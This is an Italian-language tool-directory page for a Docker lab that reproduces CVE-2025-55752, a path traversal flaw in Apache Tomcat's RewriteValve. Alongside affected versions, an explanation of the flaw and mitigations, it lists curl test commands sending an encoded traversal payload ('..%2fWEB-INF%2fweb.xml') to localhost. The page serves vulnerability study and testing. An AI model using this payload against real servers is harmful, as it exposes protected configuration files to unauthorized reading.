Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55752 — # Ambiente di riproduzione basato su Docker per CVE-2025-55752, una vulnerabilità di path traversal in Apache Tomcat's RewriteValve, che dimostra il difetto di normalizzazione prima della decodifica e fornisce comandi di test. | Kitploit
Strumenti/GitHubGitHub/masahiro331/cve-2025-55752
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubmasahiro331/cve-2025-55752

CVE-2025-55752

# Ambiente di riproduzione basato su Docker per CVE-2025-55752, una vulnerabilità di path traversal in Apache Tomcat's RewriteValve, che dimostra il difetto di normalizzazione prima della decodifica e fornisce comandi di test.

Vedi Repository
14310 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55752: Vulnerabilità di Path Traversal in Apache Tomcat

Ambiente di riproduzione basato su Docker per CVE-2025-55752, una vulnerabilità di path traversal in Apache Tomcat 10.1.44.

Panoramica

CVE-2025-55752 è una vulnerabilità di path traversal in RewriteValve di Apache Tomcat causata da un'elaborazione errata dell'ordine: la normalizzazione dell'URL avviene prima della decodifica dell'URL. Ciò consente agli attaccanti di bypassare le restrizioni di sicurezza che proteggono directory come /WEB-INF/ utilizzando sequenze di path traversal codificate nell'URL (..%2f).

Caratteristiche della Vulnerabilità

  • ID CVE: CVE-2025-55752
  • CVSS v3.1: 7.5 (ALTA)
  • CWE: CWE-22 (Path Traversal)
  • Componente: Apache Tomcat RewriteValve
  • Causa principale: Ordine di elaborazione normalizza-prima-di-decodificare

Versioni Interessate

SerieVersioni VulnerabiliVersione Corretta
11.x11.0.0-M1 a 11.0.1011.0.11+
10.1.x10.1.0-M1 a 10.1.4410.1.45+
9.0.x9.0.0-M11 a 9.0.1089.0.109+
8.5.x8.5.6 a 8.5.100EOL - Nessuna patch

Avvio Rapido

root@kitploit:~
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/

Test della Vulnerabilità

Test 1: Accesso Diretto a WEB-INF (Protetto)

root@kitploit:~
curl -I 'http://localhost:8080/WEB-INF/web.xml'

Previsto: 403 Forbidden

Test 2: Divulgazione di Informazioni (Lettura di File Protetti)

root@kitploit:~
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'

Previsto: 200 OK + contenuto di web.xml (vulnerabilità confermata)

Come Funziona

  1. Richiesta: /download?path=..%2fWEB-INF%2fweb.xml
  2. RewriteValve riscrive in: /files/..%2fWEB-INF%2fweb.xml
  3. Normalizzazione dell'URL (prima della decodifica): %2f non riconosciuto come /, .. sopravvive
  4. Decodifica dell'URL: %2f → / → /files/../WEB-INF/web.xml
  5. Risoluzione del percorso: /WEB-INF/web.xml

Problema dell'Ordine di Elaborazione

root@kitploit:~
Corretto:    Decodifica → Normalizzazione → Controllo di Sicurezza
Vulnerabile: Normalizzazione → Decodifica → Controllo di Sicurezza ✗

Correzione di Tomcat

  • GitHub: commit 130d36d8 di apache/tomcat
  • Correzione: Decodifica prima della normalizzazione

Mitigazione

  1. Disabilitare RewriteValve se non necessario
  2. Disabilitare il metodo PUT
  3. Regole WAF per bloccare ../ e %2e%2e
  4. Aggiornare alle versioni corrette (10.1.45+, 9.0.109+, 11.0.11+)

Riferimenti

  • Sicurezza di Apache Tomcat
  • NVD - CVE-2025-55752
  • OWASP Path Traversal
  • CWE-22: Limitazione Impropria di un Percorso

Disclaimer

⚠️ AVVERTENZA: NON distribuire in produzione. Utilizzare solo in ambienti di test isolati.

Scarica lo strumento